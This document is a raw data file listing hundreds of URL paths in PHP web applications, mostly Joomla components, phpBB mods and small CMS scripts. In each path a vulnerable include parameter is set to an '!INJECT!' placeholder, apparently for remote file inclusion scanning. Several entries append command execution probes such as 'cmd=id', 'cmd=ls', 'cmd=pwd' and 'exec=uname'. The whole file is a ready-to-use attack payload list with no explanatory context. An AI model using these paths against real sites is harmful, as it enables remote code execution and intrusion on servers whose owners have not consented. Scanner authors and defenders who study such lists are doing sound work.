/NuclearBB/tasks/send_queued_emails.php?root_path=!INJECT!?
/OpenSiteAdmin/indexFooter.php?path=!INJECT!%00
/OpenSiteAdmin/pages/pageHeader.php?path=!INJECT!?
/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/FieldManager.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/Filter.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/Form.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/FormManager.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/LoginManager.php?path=!INJECT!%00
/PHP/includes/header.inc.php?root=!INJECT!?
/PHPDJ_v05/dj/djpage.php?page=!INJECT!?
/PaTh/index.php?rootpath=!INJECT!
/Path_Script/createurl.php?formurl=!INJECT!
/PhotoCart/adminprint.php?admin_folder=!INJECT!
/Picssolution/install/config.php?path=!INJECT!?
/RGboard/include/footer.php?_path[counter]=!INJECT!?
/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=!INJECT!?
/SQuery/lib/gore.php?libpath=!INJECT!
/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=!INJECT!?
/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=!INJECT!?
/ScriptPage/source/includes/load_forum.php?mfh_root_path=!INJECT!
/ScriptPath/footers.php?tinybb_footers=!INJECT!
/ScriptPath/index.php?page=!INJECT!
/Script_Path/config.inc.php?_path=!INJECT!?
/Scripts/app_and_readme/navigator/index.php?page=!INJECT!
/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=!INJECT!
/Somery/team.php?checkauth=!INJECT!
/Upload/install.php?skindir=!INJECT!
/Widgets/Base/Footer.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifContainer.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifRoot.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifRoot2.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifRoot3.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifWarning.php?sys_dir=!INJECT!
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=!INJECT!?
/[path]/mybic_server.php?file=!INJECT!
/[path]/previewtheme.php?theme=1&inc_path=!INJECT!?cmd
/_administration/securite.php?cfg[document_uri]=!INJECT!
/_blogadata/include/struct_admin.php?incl_page=!INJECT!?
/_conf/_php-core/common-tpl-vars.php?admindir=!INJECT!
/_connect.php?root=!INJECT!
/_friendly/core/data/_load.php?friendly_path=!INJECT!
/_friendly/core/data/yaml.inc.php?friendly_path=!INJECT!
/_friendly/core/display/_load.php?friendly_path=!INJECT!
/_friendly/core/support/_load.php?friendly_path=!INJECT!
/_functions.php?prefix=!INJECT!
/_includes/settings.inc.php?approot=!INJECT!
/_theme/breadcrumb.php?rootBase=!INJECT!
/_wk/wk_lang.php?WK[wkPath]=!INJECT!
/abf_js.php?abs_pfad=!INJECT!?&cmd=id
/about.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/about.php?bibtexrootrel=!INJECT!?
/aboutinfo.php?bibtexrootrel=!INJECT!?
/acc.php?page=!INJECT!
/access/login.php?path_to_root=!INJECT!
/account.php?insPath=!INJECT!
/accsess/login.php?path_to_root=!INJECT!
/active/components/xmlrpc/client.php?c[components]=!INJECT!
/ad_main.php?_mygamefile=!INJECT!
/add.cgi.php?blog_theme=!INJECT!
/add_link.php?blog_theme=!INJECT!
/addpost_newpoll.php?addpoll=preview&thispath=!INJECT!
/addressbook.php?GLOBALS[basedir]=!INJECT!?
/addsite.php?returnpath=!INJECT!
/addvip.php?msetstr["PROGSDIR"]=!INJECT!
/adm/krgourl.php?DOCUMENT_ROOT=!INJECT!?
/adm/my_statistics.php?DOCUMENT_ROOT=!INJECT!?
/admin.loudmouth.php?mainframe=!INJECT!
/admin.php?Madoa=!INJECT!?
/admin.php?cal_dir=!INJECT!
/admin.php?env_dir=!INJECT!
/admin.php?lang=!INJECT!
/admin.php?page[path]=!INJECT!?&cmd=ls
/admin.php?submit=submit&form_include_template=!INJECT!
/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
/admin/ST_countries.php?include_path=!INJECT!?
/admin/ST_platforms.php?include_path=!INJECT!?
/admin/addentry.php?phpbb_root_path=!INJECT!?
/admin/addons/archive/archive.php?adminfolder=!INJECT!
/admin/admin.php?path=!INJECT!
/admin/admin.php?site_url=!INJECT!
/admin/admin_forgotten_password.php?root_folder_path=!INJECT!
/admin/admin_news_bot.php?root_path=!INJECT!?
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=!INJECT!
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=!INJECT!
/admin/admin_users.php?phpbb_root_path=!INJECT!
/admin/auth.php?xcart_dir=!INJECT!?
/admin/auth/secure.php?cfgProgDir=!INJECT!?
/admin/autoprompter.php?CONFIG[BASE_PATH]=!INJECT!
/admin/bin/patch.php?INSTALL_FOLDER=!INJECT!
/admin/catagory.php?language=!INJECT!
/admin/classes/pear/OLE/PPS.php?homedir=!INJECT!
/admin/classes/pear/OLE/PPS/File.php?homedir=!INJECT!
/admin/classes/pear/OLE/PPS/Root.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=!INJECT!
/admin/code/index.php?load_page=!INJECT!
/admin/comment.php?config[installdir]=!INJECT!
/admin/common-menu.php?CONF[local_path]=!INJECT!
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=!INJECT!?
/admin/config_settings.tpl.php?include_path=!INJECT!?&cmd=id
/admin/directory.php?config[installdir]=!INJECT!
/admin/doeditconfig.php?thispath=../includes&config[path]=!INJECT!
/admin/frontpage_right.php?loadadminpage=!INJECT!
/admin/header.php?loc=!INJECT!
/admin/inc/add.php?format_menue=!INJECT!
/admin/inc/change_action.php?format_menue=!INJECT!
/admin/include/common.php?commonIncludePath=!INJECT!?
/admin/include/header.php?repertoire=!INJECT!?
/admin/include/lib.module.php?mod_root=!INJECT!
/admin/includes/admin_header.php?level=!INJECT!?
/admin/includes/author_panel_header.php?level=!INJECT!?
/admin/includes/header.php?bypass_installed=1&secure_page_path=!INJECT!%00
/admin/includes/spaw/spaw_control.class.php?spaw_root=!INJECT!?
/admin/index.php?path_to_script=!INJECT!?&cmd=ls
/admin/index.php?pg=!INJECT!?
/admin/index.php?xtrphome=!INJECT!
/admin/index_sitios.php?_VIEW=!INJECT!
/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=!INJECT!
/admin/login.php?absolute_path=!INJECT!
/admin/news.admin.php?path_to_script=!INJECT!?&cmd=ls
/admin/news.php?language=!INJECT!
/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=!INJECT!
/admin/sendmsg.php?config[installdir]=!INJECT!
/admin/setup/level2.php?dir=!INJECT!
/admin/system/config/conf-activation.php?site_path=!INJECT!
/admin/system/include.php?skindir=!INJECT!
/admin/system/include.php?start=1&skindir=!INJECT!
/admin/system/menu/item.php?site_path=!INJECT!
/admin/system/modules/conf_modules.php?site_path=!INJECT!
/admin/templates/template_thumbnail.php?thumb_template=!INJECT!
/admin/testing/tests/0004_init_urls.php?init_path=!INJECT!?&
/admin/themes.php?config[installdir]=!INJECT!
/admin/tools/utf8conversion/index.php?path=!INJECT!?
/admin/user_user.php?language=!INJECT!
/admincp/auth/checklogin.php?cfgProgDir=!INJECT!
/admincp/auth/secure.php?cfgProgDir=!INJECT!
/adminhead.php?path[docroot]=!INJECT!
/admini/admin.php?INC=!INJECT!?
/admini/index.php?INC=!INJECT!?
/administrator/admin.php?site_absolute_path=!INJECT!?
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_color/admin.color.php?mosConfig_live_site=!INJECT!?
/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=!INJECT!?
/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=!INJECT!
/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=!INJECT!
/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=!INJECT!
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_jreactions/langset.php?comPath=!INJECT!?
/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=!INJECT!?
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=!INJECT!
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=!INJECT!
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=!INJECT!
/administrator/components/com_webring/admin.webring.docs.php?component_dir=!INJECT!?
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=!INJECT!
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=!INJECT!?
/administrator/menu_add.php?site_absolute_path=!INJECT!?
/administrator/menu_operation.php?site_absolute_path=!INJECT!?
/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=!INJECT!
/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=!INJECT!?
/adodb/adodb-errorpear.inc.php?ourlinux_root_path=!INJECT!
/adodb/adodb-pear.inc.php?ourlinux_root_path=!INJECT!
/adodb/adodb.inc.php?path=!INJECT!
/advanced_comment_system/admin.php?ACS_path=!INJECT!?
/advanced_comment_system/index.php?ACS_path=!INJECT!?
/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=!INJECT!?
/agenda.php3?rootagenda=!INJECT!
/agenda2.php3?rootagenda=!INJECT!
/aides/index.php?page=!INJECT!?
/ains_main.php?ains_path=!INJECT!
/ajax/loadsplash.php?full_path=!INJECT!
/ajouter.php?include=!INJECT!?
/akarru.gui/main_content.php?bm_content=!INJECT!
/akocomments.php?mosConfig_absolute_path=!INJECT!
/amazon/cart.php?cmd=add&asin=!INJECT!
/amazon/index.php?lang=!INJECT!
/amazon/info.php?asin=!INJECT!
/annonce.php?page=!INJECT!?&cmd=id
/announcements.php?phpraid_dir=!INJECT!
/anzagien.php?config[root_ordner]=!INJECT!?cmd=id
/apbn/templates/head.php?APB_SETTINGS[template_path]=!INJECT!
/api.php?t_path_core=!INJECT!?&cmd=id
/apps/apps.php?app=!INJECT!
/appserv/main.php?appserv_root=!INJECT!
/arab3upload/customize.php?path=!INJECT!?&cmd=pwd
/arab3upload/initialize.php?path=!INJECT!?&cmd=pwd
/arash_lib/class/arash_gadmin.class.php?arashlib_dir=!INJECT!
/arash_lib/class/arash_sadmin.class.php?arashlib_dir=!INJECT!
/arash_lib/include/edit.inc.php?arashlib_dir=!INJECT!
/arash_lib/include/list_features.inc.php?arashlib_dir=!INJECT!
/archive.php?scriptpath=!INJECT!?
/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=!INJECT!%00
/artlist.php?root_path=!INJECT!
/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=!INJECT!?cmd
/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
/athena.php?athena_dir=!INJECT!
/auction/auction_common.php?phpbb_root_path=!INJECT!
/auction/includes/converter.inc.php?include_path=!INJECT!?
/auction/includes/messages.inc.php?include_path=!INJECT!?
/auction/includes/settings.inc.php?include_path=!INJECT!?
/auction/phpAdsNew/view.inc.php?phpAds_path=!INJECT!
/auth.cookie.inc.php?da_path=!INJECT!
/auth.header.inc.php?da_path=!INJECT!
/auth.sessions.inc.php?da_path=!INJECT!
/auth/auth.php?phpbb_root_path=!INJECT!
/auth/auth_phpbb/phpbb_root_path=!INJECT!
/authenticate.php?default_path_for_themes=!INJECT!?
/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=!INJECT!
/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=!INJECT!
/auto_check_renewals.php?installed_config_file=!INJECT!?cmd=ls
/autoindex.php?cfg_file=!INJECT!?
/awzmb/adminhelp.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/help.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=!INJECT!
/axoverzicht.cgi?maand=!INJECT!
/b2-tools/gm-2-b2.php?b2inc=!INJECT!
/b2verifauth.php?index=!INJECT!?
/backend/addons/links/index.php?PATH=!INJECT!
/basebuilder/src/main.inc.php?mj_config[src_path]=!INJECT!???
/bb_admin.php?includeFooter=!INJECT!
/beacon/language/1/splash.lang.php?languagePath=!INJECT!
/beacon/language/1/splash.lang.php?languagePath=!INJECT!?
/belegungsplan/jahresuebersicht.inc.php?root=!INJECT!
/belegungsplan/monatsuebersicht.inc.php?root=!INJECT!
/belegungsplan/tagesuebersicht.inc.php?root=!INJECT!
/belegungsplan/wochenuebersicht.inc.php?root=!INJECT!
/bemarket/postscript/postscript.php?p_mode=!INJECT!
/biblioteca/bib_form.php?CLASSPATH=!INJECT!
/biblioteca/bib_pldetails.php?CLASSPATH=!INJECT!
/biblioteca/bib_plform.php?CLASSPATH=!INJECT!
/biblioteca/bib_plsearchc.php?CLASSPATH=!INJECT!
/biblioteca/bib_plsearchs.php?CLASSPATH=!INJECT!
/biblioteca/bib_save.php?CLASSPATH=!INJECT!
/biblioteca/bib_searchc.php?CLASSPATH=!INJECT!
/biblioteca/bib_searchs.php?CLASSPATH=!INJECT!
/biblioteca/edi_form.php?CLASSPATH=!INJECT!
/biblioteca/edi_save.php?CLASSPATH=!INJECT!
/biblioteca/gen_form.php?CLASSPATH=!INJECT!
/biblioteca/gen_save.php?CLASSPATH=!INJECT!
/biblioteca/lin_form.php?CLASSPATH=!INJECT!
/biblioteca/lin_save.php?CLASSPATH=!INJECT!
/biblioteca/luo_form.php?CLASSPATH=!INJECT!
/biblioteca/luo_save.php?CLASSPATH=!INJECT!
/biblioteca/sog_form.php?CLASSPATH=!INJECT!
/biblioteca/sog_save.php?CLASSPATH=!INJECT!
/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!
/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!?
/bild.php?config[root_ordner]=!INJECT!?&cmd=id
/bin/qte_init.php?qte_root=!INJECT!?
/bingoserver.php3?response_dir=!INJECT!
/block.php?Include=!INJECT!
/blocks/birthday.php?full_path=!INJECT!
/blocks/events.php?full_path=!INJECT!
/blocks/help.php?full_path=!INJECT!
/blogcms/admin/media.php?DIR_LIBS=!INJECT!?
/blogcms/admin/xmlrpc/server.php?DIR_LIBS=!INJECT!?
/blogcms/index.php?DIR_PLUGINS=!INJECT!?
/board/post.php?qb_path=!INJECT!
/boitenews4/index.php?url_index=!INJECT!?
/books/allbooks.php?home=!INJECT!
/books/home.php?home=!INJECT!
/books/mybooks.php?home=!INJECT!
/bp_ncom.php?bnrep=!INJECT!
/bp_ncom.php?bnrep=!INJECT!?
/bp_news.php?bnrep=!INJECT!
/bridge/enigma/E2_header.inc.php?boarddir=!INJECT!?
/bridge/yabbse.inc.php?sourcedir=!INJECT!
/bridges/SMF/logout.php?path_to_smf=!INJECT!
/bu/bu_cache.php?bu_dir=!INJECT!?
/bu/bu_claro.php?bu_dir=!INJECT!?
/bu/bu_parse.php?bu_dir=!INJECT!?
/bu/process.php?bu_dir=!INJECT!?
/buddy.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/builddb.php?env_dir=!INJECT!
/button/settings_sql.php?path=!INJECT!
/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=!INJECT!?
/cal.func.php?dir_edge_lang=!INJECT!
/calcul-page.php?home=!INJECT!
/calendar.php?cfg_dir=!INJECT!?
/calendar.php?lang=!INJECT!
/calendar.php?path_to_calendar=!INJECT!
/calendar.php?vwar_root=!INJECT!?
/calendar/demo/index.php?date=&v=!INJECT!?
/calendar/payment.php?insPath=!INJECT!
/calendario/cal_insert.php?CLASSPATH=!INJECT!
/calendario/cal_save.php?CLASSPATH=!INJECT!
/calendario/cal_saveactivity.php?CLASSPATH=!INJECT!
/cart.php?lang_list=!INJECT!
/cart_content.php?cart_isp_root=!INJECT!
/catalogg/inludes/include_once.php?include_file=!INJECT!
/catalogshop.php?mosConfig_absolute_path=!INJECT!
/cdsagenda/modification/SendAlertEmail.php?AGE=!INJECT!?
/cfagcms/themes/default/index.php?main=!INJECT!
/ch_readalso.php?read_xml_include=!INJECT!
/challenge.php?vwar_root=!INJECT!
/change_preferences2.php?target=!INJECT!?
/chat.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/chat.php?my[root]=!INJECT!?cm=id
/chat/adminips.php?banned_file=!INJECT!
/chat/users_popupL.php3?From=!INJECT!
/checkout.php?abs_path=!INJECT!
/checkout.php?abs_path=!INJECT!?
/ciamos_path/modules/forum/include/config.php?module_cache_path='!INJECT!'
/circ.php?include_path=!INJECT!?
/circolari/cir_save.php?CLASSPATH=!INJECT!
/citywriter/head.php?path=!INJECT!?
/cl_files/index.php?path_to_calendar=!INJECT!?
/claroline/auth/ldap/authldap.php?includePath=!INJECT!
/claroline/phpbb/page_tail.php?includePath=!INJECT!
/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=!INJECT!?
/class.mysql.php?path_to_bt_dir=!INJECT!
/class/Wiki/Wiki.php?c_node[class_path]=!INJECT!
/class/jpcache/jpcache.php?_PSL[classdir]=!INJECT!?exec=uname
/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=!INJECT!
/classes/Cache.class.php?rootdir=!INJECT!?
/classes/Customer.class.php?rootdir=!INJECT!?
/classes/Performance.class.php?rootdir=!INJECT!?
/classes/Project.class.php?rootdir=!INJECT!?
/classes/Representative.class.php?rootdir=!INJECT!?
/classes/User.class.php?rootdir=!INJECT!?
/classes/admin_o.php?absolutepath=!INJECT!
/classes/adodbt/sql.php?classes_dir=!INJECT!
/classes/adodbt/sql.php?classes_dir=!INJECT!?
/classes/board_o.php?absolutepath=!INJECT!
/classes/class_admin.php?PathToComment=!INJECT!?
/classes/class_comments.php?PathToComment=!INJECT!?
/classes/class_mail.inc.php?path_to_folder=!INJECT!
/classes/common.php?rootdir=!INJECT!?
/classes/core/language.php?rootdir=!INJECT!
/classes/dev_o.php?absolutepath=!INJECT!
/classes/file_o.php?absolutepath=!INJECT!
/classes/html/com_articles.php?absolute_path=!INJECT!
/classes/phpmailer/class.cs_phpmailer.php?classes_dir=!INJECT!
/classes/query.class.php?baseDir=!INJECT!
/classes/tech_o.php?absolutepath=!INJECT!
/classified.php?insPath=!INJECT!
/classified_right.php?language_dir=!INJECT!
/classifieds/index.php?lowerTemplate=!INJECT!
/clear.php?bibtexrootrel=!INJECT!?
/clearinfo.php?bibtexrootrel=!INJECT!?
/click.php?dir=!INJECT!?
/client.php?dir=!INJECT!
/client/faq_1/PageController.php?dir=!INJECT!
/clients/index.php?src=!INJECT!
/cls_fast_template.php?fname=!INJECT!
/cm68news/engine/oldnews.inc.php?addpath=!INJECT!?&
/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=!INJECT!?
/cms/meetweb/classes/ManagerResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/RegForm.class.php?root_path=!INJECT!
/cms/meetweb/classes/RegResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/RegRightsResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/modules.php?root_path=!INJECT!
/cms/modules/form.lib.php?sourceFolder=!INJECT!?
/cms/system/openengine.php?oe_classpath=!INJECT!???
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=!INJECT!?
/cn_config.php?tpath=!INJECT!?
/coast/header.php?sections_file=!INJECT!?
/code/berylium-classes.php?beryliumroot=!INJECT!?
/code/display.php?admindir=!INJECT!?
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=!INJECT!
/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=!INJECT!?
/com_media_library/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/comments.php?AMG_serverpath=!INJECT!
/comments.php?scriptpath=!INJECT!?
/common.inc.php?CFG[libdir]=!INJECT!
/common.inc.php?CFG[libdir]=!INJECT!?
/common.inc.php?base_path=!INJECT!
/common.php?db_file=!INJECT!
/common.php?dir=!INJECT!
/common.php?ezt_root_path=!INJECT!?
/common.php?include_path=!INJECT!
/common.php?livealbum_dir=!INJECT!?
/common.php?locale=!INJECT!
/common.php?phpht_real_path=!INJECT!?
/common/db.php?commonpath=!INJECT!?
/common/func.php?CommonAbsD=!INJECT!?
/common/func.php?CommonAbsDir=!INJECT!
/community/Offline.php?sourcedir=!INJECT!?
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=!INJECT!
/components/calendar/com_calendar.php?absolute_path=!INJECT!?
/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=!INJECT!
/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=!INJECT!
/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=!INJECT!
/components/com_articles.php?absolute_path=!INJECT!?
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=!INJECT!
/components/com_calendar.php?absolute_path=!INJECT!?
/components/com_cpg/cpg.php?mosConfig_absolute_path=!INJECT!?
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=!INJECT!
/components/com_facileforms/facileforms.frame.php?ff_compath=!INJECT!
/components/com_forum/download.php?phpbb_root_path=!INJECT!
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=!INJECT!
/components/com_guestbook.php?absolute_path=!INJECT!?
